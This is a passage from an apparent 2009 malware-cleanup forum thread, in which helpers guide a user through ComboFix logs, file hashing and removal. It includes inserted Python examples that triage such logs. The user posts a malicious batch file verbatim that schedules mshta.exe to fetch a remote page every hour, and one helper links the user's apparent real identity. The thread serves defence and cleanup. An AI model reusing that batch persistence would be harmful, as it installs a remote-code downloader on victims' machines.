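Two parts of the log above are what a helper reads first: the Sigcheck block (is the loaded copy of a protected system file identical to the copy Windows File Protection keeps in dllcache?) and the GloballyOpenPorts list (53/TCP for "webserver" and 8085/TCP for "ddnsfilter", which line up with the c:\program files\webserver directory and the removed Legacy_DDNSFILTER driver elsewhere in the same log). As an added example that is not part of this thread or of ComboFix, the Python below parses those two sections from constructed sample lines copied in shape from the log; the location classification and the "live vs dllcache" rule are this example's own, not ComboFix's.

```python
"""Triage helpers for a ComboFix-style log (added example, not ComboFix code).

Copies under $hf_mig$ are the hotfix (QFE) branch and copies under
$NtUninstall* are the pre-patch version; both legitimately differ from
the live file. The comparison that matters is live copy vs dllcache copy.
"""
import re
from collections import defaultdict

# Constructed sample: Sigcheck and GloballyOpenPorts lines in the layout
# ComboFix prints; not a complete log.
SAMPLE_LOG = r"""
------- Sigcheck -------

  • 2008-06-20 . AD978A1B783B5719720CFF204B666C8E . 361600 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\tcpip.sys
  • 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\tcpip.sys
  • 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\system32\drivers\tcpip.sys
[7] 2008-04-14 . 93EA8D04EC73A85DB02EB8805988F733 . 361344 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB951748$\tcpip.sys

  • 2008-06-20 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625] . . c:\windows\system32\mswsock.dll
  • 2008-06-20 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\mswsock.dll
  • 2008-06-20 . FCEE5FCB99F7C724593365C706D28388 . 245248 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\mswsock.dll
[7] 2008-04-14 . B4138E99236F0F57D4CF49BAE98A0746 . 245248 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB951748$\mswsock.dll
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"8085:TCP"= 8085:TCP:ddnsfilter
"53:TCP"= 53:TCP:webserver
"""

# "<date> . <MD5> . <size> . . [<version>] . . <path>"
SIGCHECK_RE = re.compile(
    r"\. ([0-9A-Fa-f]{32}) \. (\d+) \. \. \[([^\]]*)\] \. \. (.+?)\s*$", re.MULTILINE
)
# '"8085:TCP"= 8085:TCP:ddnsfilter'
OPEN_PORT_RE = re.compile(r'^"(\d+):(TCP|UDP)"=\s*\d+:(?:TCP|UDP):(\S+)', re.MULTILINE)


def classify_location(path):
    """Map a Sigcheck path to the role that copy plays on the system."""
    p = path.lower()
    if "\\dllcache\\" in p:
        return "dllcache"      # WFP's protected reference copy
    if "$hf_mig$" in p:
        return "hf_mig"        # hotfix (QFE) branch, differs by design
    if "$ntuninstall" in p:
        return "uninstall"     # pre-patch version kept for rollback
    return "live"              # the copy actually loaded (system32 / drivers)


def parse_sigcheck(log):
    """Return {basename: {location: MD5}} for every Sigcheck line."""
    files = defaultdict(dict)
    for md5, _size, _version, path in SIGCHECK_RE.findall(log):
        name = path.rsplit("\\", 1)[-1].lower()
        files[name][classify_location(path)] = md5.upper()
    return dict(files)


def live_matches_dllcache(files):
    """True per file when the loaded copy hashes the same as dllcache.

    False is the cue to hash the file independently (e.g. Jotti/VirusTotal);
    True only says WFP's cache agrees with the live copy, not that it is clean.
    """
    return {
        name: locs["live"] == locs["dllcache"]
        for name, locs in files.items()
        if "live" in locs and "dllcache" in locs
    }


def globally_open_ports(log):
    """List (port, protocol, label) for every system-wide firewall opening."""
    return [(int(port), proto, label) for port, proto, label in OPEN_PORT_RE.findall(log)]


if __name__ == "__main__":
    files = parse_sigcheck(SAMPLE_LOG)
    for name, ok in live_matches_dllcache(files).items():
        print(f"{name}: live == dllcache -> {ok}")
    for port, proto, label in globally_open_ports(SAMPLE_LOG):
        print(f"open {port}/{proto} for '{label}'")
```

On this log both tcpip.sys and mswsock.dll pass the live-vs-dllcache check, which is consistent with the later Jotti result in this thread; the open 53/TCP and 8085/TCP entries are what an analyst would still follow up on.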
f-arn (Guru)
19 September 2009 - 14:31 #10
Find and upload these files at Jotti or Virustotal:

c:\windows\system32\drivers\tcpip.sys
c:\windows\system32\es.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\mswsock.dll


http://virusscan.jotti.org/ - http://www.virustotal.com/en/indexf.html

You may need to turn on show hidden files and folders.

If you don't know how, see here:
http://www.it-artikler.dk/2008/03/05/vis-skjulte-filer-og-mapper/

Copy the result here
claes57 (Expert)
19 September 2009 - 14:39 #11
karise_larry ref #7
if the programs are gone, only empty references remain in the registry, and those are easy to remove with ccleaner afterwards.
There are no running/active viruses left, and that is the purpose.

It is far easier than having to stop running processes and services to work your way through an infected machine.

Ok - so it's a quick fix that doesn't require deeper insight - but maybe that's a flaw in my method.
19 September 2009 - 14:44 #12
<claes57>: Well, you need access to a 'clean' PC + screwdriver + the tools mentioned ...
Serious scanner programs (e.g. the mentioned Malwarebytes/Combofix) are quite capable of killing any running processes...

---

Sorry for the 'spam' in this thread...
sir_smokealot (Beginner)
19 September 2009 - 14:48 #13
All four files have now been scanned with Jotti's Malware Scan without finding anything....all got the status "found nothing"
johnstigers (Senior Master)
19 September 2009 - 15:20 #14
#5
Not everyone can "just" take the hdd out of the machine. That solution is probably very good, but not everyone can figure it out - so it must be for when the machine is heavily infected.
johnstigers (Senior Master)
19 September 2009 - 15:23 #15
If you are a frequent Facebook user, it is best to use Firefox, since it has several different Facebook plugins that can block applications, quizzes etc.
f-arn (Guru)
19 September 2009 - 17:10 #16
Start hijackthis, click "do a system scan only" and tick the line below, close all windows except

Hijackthis and click fix checked.

O23 - Service: Marvell Yukon Service (yksvc) - Unknown owner - RUNDLL32.EXE (file missing)

Restart and then tell us how the computer runs?
sullep (Beginner)
19 September 2009 - 19:44 #17
What about these, it would probably be a good idea to remove them too.

c:\windows\bk23567.dat
c:\windows\e323567.dat


Wonder what's running here
C:\k48N.bat
claes57 (Expert)
19 September 2009 - 20:40 #18
just a shame that
http://www.linkedin.com/pub/dir/yngve/ralph
cf.
((((((((((((((((((((((((((((((((((((((((  Find3M Report  ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-20 07:55 . 2009-07-09 21:03    --------    d-----w-    c:\documents and settings\LocalService\Application Data\SACore
2009-09-18 21:16 . 2009-08-12 16:24    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Apple Computer
apparently is
Currently:
Past: Senior Consultant at IBM; Senior Consultant at IBM Global Business Services; Senior Consultant at IBM Business Consulting Services

I wouldn't seek help there.
f-arn (Guru)
19 September 2009 - 21:25 #19
@sullep
Thanks, I had overlooked that bat file

@sir_smokealot
Click Start, Run and paste the following
notepad C:\k48N.bat
A text file should then open
Feel free to copy its contents here
johnstigers (Senior Master)
19 September 2009 - 21:36 #20
Why not just right-click the file and choose edit?
f-arn (Guru)
19 September 2009 - 21:43 #21
@john_stigers
To minimize the risk of mistakes.
sir_smokealot (Beginner)
20 September 2009 - 09:25 #22
The computer runs much better now. It seems like it's about to be virus free.

C:\k48N.bat:

@echo off
sc config Schedule start= auto
net start Schedule
at /delete /yes
at 00:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 01:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 02:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 03:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 04:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 05:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 06:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 07:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 08:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 09:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 10:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 11:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 12:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 13:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 14:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 15:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 16:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 17:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 18:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 19:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 20:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 21:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 22:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
at 23:33 /every:M,T,W,Th,F,S,Su mshta.exe http://urodinam.net/33t.php?stime=1253250220
exit
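The batch file above shows the whole persistence mechanism in plain text: it makes sure the Task Scheduler service runs, wipes every existing at-job, and schedules mshta.exe to fetch a remote .php page once an hour, all day, every day; the 24 At1.job..At24.job files ComboFix deleted in #9 line up with those 24 `at` lines. As an added example that is not a tool from this thread, the Python below pulls exactly those traits out of such a file. The sample input is constructed in the shape of C:\k48N.bat with the callback host replaced by the placeholder callback.example, and the list of script hosts it watches is this example's own choice.

```python
"""Static triage of a batch file that installs `at` scheduled tasks
(added example; not a tool from this thread).
"""
import re
from urllib.parse import urlparse

# Constructed sample shaped like the posted k48N.bat.
# PLACEHOLDER: callback.example stands in for the real callback host.
SAMPLE_BATCH = "\n".join(
    ["@echo off", "sc config Schedule start= auto", "net start Schedule", "at /delete /yes"]
    + [f"at {h:02d}:33 /every:M,T,W,Th,F,S,Su mshta.exe http://callback.example/33t.php?stime=0"
       for h in range(24)]
    + ["exit"]
)

# "at HH:MM /every:<days> <command ...>"
AT_JOB_RE = re.compile(r"^\s*at\s+(\d{1,2}):(\d{2})\s+/every:(\S+)\s+(.+?)\s*$", re.I | re.M)
# "at /delete /yes" removes every existing job without prompting
AT_WIPE_RE = re.compile(r"^\s*at\s+/delete\s+/yes", re.I | re.M)
URL_RE = re.compile(r"https?://\S+", re.I)
# Signed Windows binaries that execute remote content when handed a URL;
# which ones to watch is a choice made for this example.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe", "rundll32.exe"}


def parse_at_jobs(batch_text):
    """Return one dict per `at HH:MM /every:... <cmd>` line."""
    jobs = []
    for hh, mm, every, cmd in AT_JOB_RE.findall(batch_text):
        jobs.append({
            "hour": int(hh),
            "minute": int(mm),
            "days": every.split(","),
            "exe": cmd.split()[0].lower(),
            "urls": URL_RE.findall(cmd),
        })
    return jobs


def assess_batch(batch_text):
    """Return human-readable findings; an empty list means nothing matched."""
    findings = []
    jobs = parse_at_jobs(batch_text)

    if AT_WIPE_RE.search(batch_text):
        findings.append("deletes every existing at-job before scheduling its own")
    if "sc config schedule start= auto" in batch_text.lower():
        findings.append("forces the Task Scheduler service to start automatically")

    # Script host + URL in a scheduled command: a recurring remote fetch.
    remote = [j for j in jobs if j["exe"] in SCRIPT_HOSTS and j["urls"]]
    if remote:
        exes = sorted({j["exe"] for j in remote})
        hosts = sorted({urlparse(u).netloc for j in remote for u in j["urls"]})
        findings.append(f"{len(remote)} job(s) run {exes} against remote host(s) {hosts}")

    # One job per hour, all at the same minute: a fixed-interval beacon.
    hours = {j["hour"] for j in jobs}
    minutes = {j["minute"] for j in jobs}
    if len(hours) == 24 and len(minutes) == 1:
        findings.append(f"hourly beacon: a job for every hour of the day at :{next(iter(minutes)):02d}")
    return findings


if __name__ == "__main__":
    for finding in assess_batch(SAMPLE_BATCH):
        print("-", finding)
```

The same checks apply to the output of `at` on a live machine or to the At*.job names ComboFix lists under Other Deletions: many numbered jobs appearing at once, a script host with a URL as its argument, and a cadence of exactly one run per hour are each worth a look on their own and together leave little doubt.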
f-arn (Guru)
20 September 2009 - 10:36 #23
Right-click on the desktop and choose New->Text Document, copy the content between the lines into it and save the file as
CFScript.txt

Make sure it doesn't end up being named CFScript.txt.txt


--------------

Killall::
Snapshot::
File::
C:\k48N.bat
c:\windows\bk23567.dat
c:\windows\e323567.dat


--------------

Since Combofix can conflict with your antivirus, it's important that you disable it.

Then grab the new file with the mouse, drag it onto the Combofix file and "let go" of the mouse button.
http://www.fromsej.saknet.dk/billeder/cfscript.gif


Combofix should then start working. It may require a restart, which you should allow. You should not click on the window while the tool is running, as it can cause your computer to freeze.
When Combofix is finished, and after it has (possibly) restarted, a log file should open: combofix.txt, which is located here: C:\Combofix.txt

Feel free to post the contents of that file here.
sullep (Beginner)
20 September 2009 - 10:39 #24
Good thing we got that file checked, it has to be deleted >

C:\k48N.bat:
f-arn (Guru)
20 September 2009 - 10:55 #25
@sullep
Yes, thanks for that sullep.
As you can see, that was my conclusion too.
sir_smokealot (Beginner)
20 September 2009 - 11:02 #26
ComboFix 09-09-18.02 - Yngve Ralph 2009-09-21 10:41:37.2.1 - NTFSx86
Microsoft Windows XP Home Edition  5.1.2600.3.1252.1.1033.18.894.523 [GMT 2:00]
Running from: C:\Documents and Settings\Yngve Ralph\Desktop\ComboFix.exe
Command switches used :: C:\Documents and Settings\Yngve Ralph\Desktop\CFScript.txt
AV: McAfee VirusScan *On-access scanning disabled* (Outdated) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Personal Firewall *enabled* {94894B63-8C7F-4050-BDA4-813CA00DA3E8}

FILE ::
"C:\k48N.bat"
"c:\windows\bk23567.dat"
"c:\windows\e323567.dat"
.

(((((((((((((((((((((((((((((((((((((((  Other Deletions  )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\k48N.bat

.
(((((((((((((((((((((((((  Files Created from 2009-08-21 to 2009-09-21  )))))))))))))))))))))))))))))))
.

2009-09-20 10:07:42 . 2009-09-20 10:07:42    0    d-----w-    C:\Documents and Settings\Yngve Ralph\Application Data\Malwarebytes
2009-09-20 10:07:36 . 2009-09-10 12:54:06    38224    ----a-w-    C:\WINDOWS\system32\drivers\mbamswissarmy.sys
2009-09-20 10:07:34 . 2009-09-20 10:07:34    0    d-----w-    C:\Documents and Settings\All Users\Application Data\Malwarebytes
2009-09-20 10:07:34 . 2009-09-10 12:53:50    19160    ----a-w-    C:\WINDOWS\system32\drivers\mbam.sys
2009-09-20 10:07:33 . 2009-09-20 10:07:41    0    d-----w-    C:\Program Files\Malwarebytes' Anti-Malware
2009-09-20 09:45:22 . 2009-09-20 09:45:27    0    d-----w-    C:\Program Files\CCleaner
2009-09-20 08:44:22 . 2009-09-20 08:44:22    0    d-----w-    C:\Program Files\Trend Micro
2009-09-18 21:27:33 . 2009-09-18 21:27:33    17564    ---ha-w-    C:\WINDOWS\system32\mlfcache.dat
2009-09-18 21:19:30 . 2009-09-18 21:20:37    0    d-----w-    C:\Program Files\Safari
2009-09-18 21:12:25 . 2009-09-18 21:12:25    0    d-----w-    C:\Program Files\iPod
2009-09-18 21:12:17 . 2009-09-18 21:21:54    0    d-----w-    C:\Program Files\iTunes
2009-09-18 21:12:17 . 2009-09-18 21:14:29    0    d-----w-    C:\Documents and Settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
2009-09-18 21:08:19 . 2009-09-18 21:09:40    0    d-----w-    C:\Program Files\QuickTime
2009-09-13 08:45:59 . 2009-09-20 10:16:57    0    d-----w-    C:\Program Files\webserver
2009-08-26 19:48:48 . 2009-08-26 19:53:49    0    d-----w-    C:\Documents and Settings\Yngve Ralph\Application Data\Spotify
2009-08-26 19:48:48 . 2009-08-26 19:49:53    0    d-----w-    C:\Documents and Settings\Yngve Ralph\Local Settings\Application Data\Spotify
2009-08-26 19:48:45 . 2009-08-26 19:48:46    0    d-----w-    C:\Program Files\Spotify

.
((((((((((((((((((((((((((((((((((((((((  Find3M Report  ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-20 07:55:46 . 2009-07-09 21:03:13    0    d-----w-    C:\Documents and Settings\LocalService\Application Data\SACore
2009-09-18 21:16:42 . 2009-08-12 16:24:04    0    d-----w-    C:\Documents and Settings\Yngve Ralph\Application Data\Apple Computer
2009-09-18 21:12:21 . 2009-08-12 16:19:03    0    d-----w-    C:\Program Files\Common Files\Apple
2009-08-28 17:42:52 . 2009-08-12 16:19:49    40448    ----a-w-    C:\WINDOWS\system32\drivers\usbaapl.sys
2009-08-28 17:42:52 . 2009-08-12 16:19:49    2065696    ----a-w-    C:\WINDOWS\system32\usbaaplrc.dll
2009-08-12 16:27:31 . 2009-08-12 16:27:31    17536    ----a-w-    C:\Documents and Settings\Yngve Ralph\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-08-12 16:23:42 . 2009-08-12 16:22:48    0    d-----w-    C:\Documents and Settings\All Users\Application Data\{8CD7F5AF-ECFA-4793-BF40-D8F42DBFF906}
2009-08-12 16:22:48 . 2009-08-12 16:20:32    0    d-----w-    C:\Documents and Settings\All Users\Application Data\Apple Computer
2009-08-12 16:22:17 . 2009-08-12 16:22:17    0    d-----w-    C:\Program Files\Bonjour
2009-08-12 16:20:03 . 2009-08-12 16:20:00    0    d-----w-    C:\Program Files\Apple Software Update
2009-08-12 16:19:03 . 2009-08-12 16:19:03    0    d-----w-    C:\Documents and Settings\All Users\Application Data\Apple
2009-08-11 15:06:14 . 2009-03-27 20:22:15    0    d-----w-    C:\Program Files\McAfee
2009-08-05 10:09:00 . 2009-08-05 10:06:54    0    d-----w-    C:\Program Files\Comviq Surf Connect
2009-08-05 10:09:00 . 2009-08-05 10:06:14    0    d-----w-    C:\Documents and Settings\All Users\Application Data\DatacardService
2009-08-05 09:01:48 . 2009-03-27 18:48:13    204800    ----a-w-    C:\WINDOWS\system32\mswebdvd.dll
2009-07-17 19:01:06 . 2009-03-27 18:48:01    58880    ----a-w-    C:\WINDOWS\system32\atl.dll
2009-07-13 21:43:24 . 2009-03-27 18:48:32    286208    ----a-w-    C:\WINDOWS\system32\wmpdxm.dll
2009-07-09 03:03:47 . 2009-07-09 03:04:16    410984    ----a-w-    C:\WINDOWS\system32\deploytk.dll
2009-07-03 17:09:28 . 2009-03-27 18:48:24    915456    ------w-    C:\WINDOWS\system32\wininet.dll
.

------- Sigcheck -------

  • 2008-06-20 11:59:02 . AD978A1B783B5719720CFF204B666C8E . 361600 . . [5.1.2600.5625 (xpsp_sp3_qfe.080620-1309)] . . C:\WINDOWS\$hf_mig$\KB951748\SP3QFE\tcpip.sys
  • 2008-06-20 11:51:12 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625 (xpsp_sp3_gdr.080620-1249)] . . C:\WINDOWS\system32\dllcache\tcpip.sys
  • 2008-06-20 11:51:12 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625 (xpsp_sp3_gdr.080620-1249)] . . C:\WINDOWS\system32\drivers\tcpip.sys
[7] 2008-04-14 12:00:00 . 93EA8D04EC73A85DB02EB8805988F733 . 361344 . . [5.1.2600.5512 (xpsp.080413-0852)] . . C:\WINDOWS\$NtUninstallKB951748$\tcpip.sys

  • 2008-07-07 20:26:58 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . C:\WINDOWS\system32\es.dll
  • 2008-07-07 20:26:58 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . C:\WINDOWS\system32\dllcache\es.dll
  • 2008-07-07 20:23:18 . F17F6226BDC0CD5F0BEF0DAF84D29BEC . 253952 . . [2001.12.4414.706] . . C:\WINDOWS\$hf_mig$\KB950974\SP3QFE\es.dll
[7] 2008-04-14 12:00:00 . 19A799805B24990867B00C120D300C3A . 246272 . . [2001.12.4414.701] . . C:\WINDOWS\$NtUninstallKB950974$\es.dll

  • 2009-03-21 14:06:58 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781 (xpsp_sp3_gdr.090321-1317)] . . C:\WINDOWS\system32\kernel32.dll
  • 2009-03-21 14:06:58 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781 (xpsp_sp3_gdr.090321-1317)] . . C:\WINDOWS\system32\dllcache\kernel32.dll
  • 2009-03-21 13:59:23 . DA11D9D6ECBDF0F93436A4B7C13F7BEC . 991744 . . [5.1.2600.5781 (xpsp_sp3_qfe.090321-1341)] . . C:\WINDOWS\$hf_mig$\KB959426\SP3QFE\kernel32.dll
[7] 2008-04-14 12:00:00 . C24B983D211C34DA8FCC1AC38477971D . 989696 . . [5.1.2600.5512 (xpsp.080413-2111)] . . C:\WINDOWS\$NtUninstallKB959426$\kernel32.dll

  • 2008-06-20 17:46:57 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625 (xpsp_sp3_gdr.080620-1249)] . . C:\WINDOWS\system32\mswsock.dll
  • 2008-06-20 17:46:57 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625 (xpsp_sp3_gdr.080620-1249)] . . C:\WINDOWS\system32\dllcache\mswsock.dll
  • 2008-06-20 17:43:05 . FCEE5FCB99F7C724593365C706D28388 . 245248 . . [5.1.2600.5625 (xpsp_sp3_qfe.080620-1309)] . . C:\WINDOWS\$hf_mig$\KB951748\SP3QFE\mswsock.dll
[7] 2008-04-14 12:00:00 . B4138E99236F0F57D4CF49BAE98A0746 . 245248 . . [5.1.2600.5512 (xpsp.080413-0852)] . . C:\WINDOWS\$NtUninstallKB951748$\mswsock.dll
.
(((((((((((((((((((((((((((((((((((((  Reg Loading Points  ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2009-03-27 20:13:01 39408]
"MSMSGS"="C:\Program Files\Messenger\msmsgs.exe" [2008-04-14 13:42:30 1695232]
f-arn (Guru)
20 September 2009 - 11:12 #27
That log is a bit short :) Would you please send it once more, and this time make sure you get all of it. By the way, I've noticed that in every log we've seen so far, you've been a day ahead of me?
sir_smokealot (Beginner)
20 September 2009 - 15:52 #28
Had a few problems with Combofix... here's a new log. The date has been updated (after the log was created)


ComboFix 09-09-18.02 - Yngve Ralph 2009-09-21 15:28.3.1 - NTFSx86
Microsoft Windows XP Home Edition  5.1.2600.3.1252.1.1033.18.894.518 [GMT 2:00]
Running from: c:\documents and settings\Yngve Ralph\Desktop\ComboFix.exe
AV: McAfee VirusScan *On-access scanning disabled* (Outdated) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Personal Firewall *enabled* {94894B63-8C7F-4050-BDA4-813CA00DA3E8}
.

(((((((((((((((((((((((((((((((((((((((  Other Deletions  )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
---- Previous Run -------
.
C:\k48N.bat

.
(((((((((((((((((((((((((  Files Created from 2009-08-21 to 2009-09-21  )))))))))))))))))))))))))))))))
.

2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Malwarebytes
2009-09-20 10:07 . 2009-09-10 12:54    38224    ----a-w-    c:\windows\system32\drivers\mbamswissarmy.sys
2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\documents and settings\All Users\Application Data\Malwarebytes
2009-09-20 10:07 . 2009-09-10 12:53    19160    ----a-w-    c:\windows\system32\drivers\mbam.sys
2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\program files\Malwarebytes' Anti-Malware
2009-09-20 09:45 . 2009-09-20 09:45    --------    d-----w-    c:\program files\CCleaner
2009-09-20 08:44 . 2009-09-20 08:44    --------    d-----w-    c:\program files\Trend Micro
2009-09-18 21:27 . 2009-09-18 21:27    17564    ---ha-w-    c:\windows\system32\mlfcache.dat
2009-09-18 21:19 . 2009-09-18 21:20    --------    d-----w-    c:\program files\Safari
2009-09-18 21:12 . 2009-09-18 21:12    --------    d-----w-    c:\program files\iPod
2009-09-18 21:12 . 2009-09-18 21:21    --------    d-----w-    c:\program files\iTunes
2009-09-18 21:12 . 2009-09-18 21:14    --------    d-----w-    c:\documents and settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
2009-09-18 21:08 . 2009-09-18 21:09    --------    d-----w-    c:\program files\QuickTime
2009-09-13 08:45 . 2009-09-20 10:16    --------    d-----w-    c:\program files\webserver
2009-08-26 19:48 . 2009-08-26 19:53    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Spotify
2009-08-26 19:48 . 2009-08-26 19:49    --------    d-----w-    c:\documents and settings\Yngve Ralph\Local Settings\Application Data\Spotify
2009-08-26 19:48 . 2009-08-26 19:48    --------    d-----w-    c:\program files\Spotify

.
((((((((((((((((((((((((((((((((((((((((  Find3M Report  ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-20 07:55 . 2009-07-09 21:03    --------    d-----w-    c:\documents and settings\LocalService\Application Data\SACore
2009-09-18 21:16 . 2009-08-12 16:24    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Apple Computer
2009-09-18 21:12 . 2009-08-12 16:19    --------    d-----w-    c:\program files\Common Files\Apple
2009-08-28 17:42 . 2009-08-12 16:19    40448    ----a-w-    c:\windows\system32\drivers\usbaapl.sys
2009-08-28 17:42 . 2009-08-12 16:19    2065696    ----a-w-    c:\windows\system32\usbaaplrc.dll
2009-08-12 16:27 . 2009-08-12 16:27    17536    ----a-w-    c:\documents and settings\Yngve Ralph\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-08-12 16:23 . 2009-08-12 16:22    --------    d-----w-    c:\documents and settings\All Users\Application Data\{8CD7F5AF-ECFA-4793-BF40-D8F42DBFF906}
2009-08-12 16:22 . 2009-08-12 16:20    --------    d-----w-    c:\documents and settings\All Users\Application Data\Apple Computer
2009-08-12 16:22 . 2009-08-12 16:22    --------    d-----w-    c:\program files\Bonjour
2009-08-12 16:20 . 2009-08-12 16:20    --------    d-----w-    c:\program files\Apple Software Update
2009-08-12 16:19 . 2009-08-12 16:19    --------    d-----w-    c:\documents and settings\All Users\Application Data\Apple
2009-08-11 15:06 . 2009-03-27 20:22    --------    d-----w-    c:\program files\McAfee
2009-08-05 10:09 . 2009-08-05 10:06    --------    d-----w-    c:\program files\Comviq Surf Connect
2009-08-05 10:09 . 2009-08-05 10:06    --------    d-----w-    c:\documents and settings\All Users\Application Data\DatacardService
2009-08-05 09:01 . 2009-03-27 18:48    204800    ----a-w-    c:\windows\system32\mswebdvd.dll
2009-07-17 19:01 . 2009-03-27 18:48    58880    ----a-w-    c:\windows\system32\atl.dll
2009-07-13 21:43 . 2009-03-27 18:48    286208    ----a-w-    c:\windows\system32\wmpdxm.dll
2009-07-09 03:03 . 2009-07-09 03:04    410984    ----a-w-    c:\windows\system32\deploytk.dll
2009-07-03 17:09 . 2009-03-27 18:48    915456    ------w-    c:\windows\system32\wininet.dll
.

------- Sigcheck -------

  • 2008-06-20 . AD978A1B783B5719720CFF204B666C8E . 361600 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\tcpip.sys
  • 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\tcpip.sys
  • 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\system32\drivers\tcpip.sys
[7] 2008-04-14 . 93EA8D04EC73A85DB02EB8805988F733 . 361344 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB951748$\tcpip.sys

  • 2008-07-07 20:26 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . c:\windows\system32\es.dll
  • 2008-07-07 20:26 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . c:\windows\system32\dllcache\es.dll
  • 2008-07-07 20:23 . F17F6226BDC0CD5F0BEF0DAF84D29BEC . 253952 . . [2001.12.4414.706] . . c:\windows\$hf_mig$\KB950974\SP3QFE\es.dll
[7] 2008-04-14 12:00 . 19A799805B24990867B00C120D300C3A . 246272 . . [2001.12.4414.701] . . c:\windows\$NtUninstallKB950974$\es.dll

  • 2009-03-21 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781] . . c:\windows\system32\kernel32.dll
  • 2009-03-21 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781] . . c:\windows\system32\dllcache\kernel32.dll
